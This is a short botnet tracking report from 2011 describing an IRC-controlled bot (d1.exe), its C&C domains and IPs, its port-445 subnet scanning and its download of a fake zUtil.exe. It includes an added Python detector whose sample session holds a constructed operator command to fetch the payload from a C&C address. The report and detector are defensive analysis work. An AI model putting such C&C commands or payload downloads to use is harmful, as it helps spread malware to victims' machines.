Botnet report #4

This report refers to botnet tracking carried out on March 21, 2011. The botnet is hosted at Radore Hosting Telekomunikasyon Hizmetleri (Turkey). The IPs involved (partial list) are 178.211.56.104, 178.211.56.105 and 178.211.56.90 – 178.211.56.102. Reported by Divisione ricerca e sicurezza – servermanaged.it.




File : d1.exe

Main botnet domains :

java.KUTLUFAMILY.COM – 178.211.56.105 – 178.211.56.104

www.bitcity.org – 178.211.56.105 – 178.211.56.104

It appears that after execution d1.exe looks up java.KUTLUFAMILY.COM and www.bitcity.org and successfully connects to the C&C servers. The main botnet channel is #d1 on 178.211.56.104. The bot client sends a JOIN #d1 and waits for commands issued by the botnet operator, usually given via a private message. The main purpose of the botnet is to scan entire subnets looking for more victims to infect:

PRIVMSG [N00_ITA_XP_8209..@ :scan; Sequential Port Scan started on 192.168.1.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.

Before this, however, the botnet operator instructs the bot to download a fake copy of zUtil.exe, usually hosted on 178.211.56.90. zUtil.exe probably serves as the scanning and bot-control tool.
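The JOIN / PRIVMSG exchange described above, turned into a small detector that parses captured IRC lines and flags the report's indicators (the #d1 channel, the C&C hosts and the zUtil.exe payload). This is an added example, not part of the original report; the sample session and the operator's download command syntax are constructed, not taken from a real capture.

```python
import re
from collections import namedtuple

# Indicators taken from the report: C&C channel, C&C hosts/domains, payload name.
C2_CHANNEL = "#d1"
C2_HOSTS = {"178.211.56.104", "178.211.56.105", "178.211.56.90",
            "java.kutlufamily.com", "www.bitcity.org"}
PAYLOAD_NAME = "zutil.exe"
SCAN_RE = re.compile(r"Sequential Port Scan started on (\S+?):(\d+)")

IrcMessage = namedtuple("IrcMessage", "prefix command params trailing")

def parse_irc(line):
    """Split one IRC line into [:prefix] COMMAND params [:trailing]."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")   # first " :" starts the trailing arg
    parts = head.split()
    return IrcMessage(prefix, parts[0].upper(), parts[1:], trailing if sep else None)

def detect_c2_activity(lines):
    """Return (line_no, alert, detail) tuples for lines matching the report's indicators."""
    alerts = []
    for no, raw in enumerate(lines, 1):
        msg = parse_irc(raw)
        text = (msg.trailing or "").lower()
        if msg.command == "JOIN" and C2_CHANNEL in msg.params:
            alerts.append((no, "C2_CHANNEL_JOIN", C2_CHANNEL))
        if msg.command == "PRIVMSG" and msg.trailing:
            m = SCAN_RE.search(msg.trailing)       # bot reporting a scan it was told to run
            if m:
                alerts.append((no, "SCAN_REPORT", "%s port %s" % (m.group(1), m.group(2))))
        if PAYLOAD_NAME in text or any(h in text for h in C2_HOSTS):
            alerts.append((no, "PAYLOAD_OR_C2_REFERENCE", raw))
    return alerts

# Constructed sample session modelled on the report (not a real capture); the
# operator's "download <url>" command syntax is an assumption, not from the report.
SAMPLE_SESSION = [
    "NICK N00_ITA_XP_8209",
    "JOIN #d1",
    ":operator!op@example PRIVMSG N00_ITA_XP_8209 :download http://178.211.56.90/zUtil.exe",
    ":N00_ITA_XP_8209!bot@host PRIVMSG #d1 :scan; Sequential Port Scan started on 192.168.1.0:445 with a delay of 5 seconds for 0 minutes using 10 threads.",
    "PING :irc.example",
]
```

Running `detect_c2_activity(SAMPLE_SESSION)` yields three alerts: the channel join, the payload download instruction and the scan report with its target and port.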

Partial list of IPs involved in the botnet: 178.211.56.104, 178.211.56.105, 178.211.56.90 – 178.211.56.102

Divisione ricerca e sicurezza – servermanaged.it
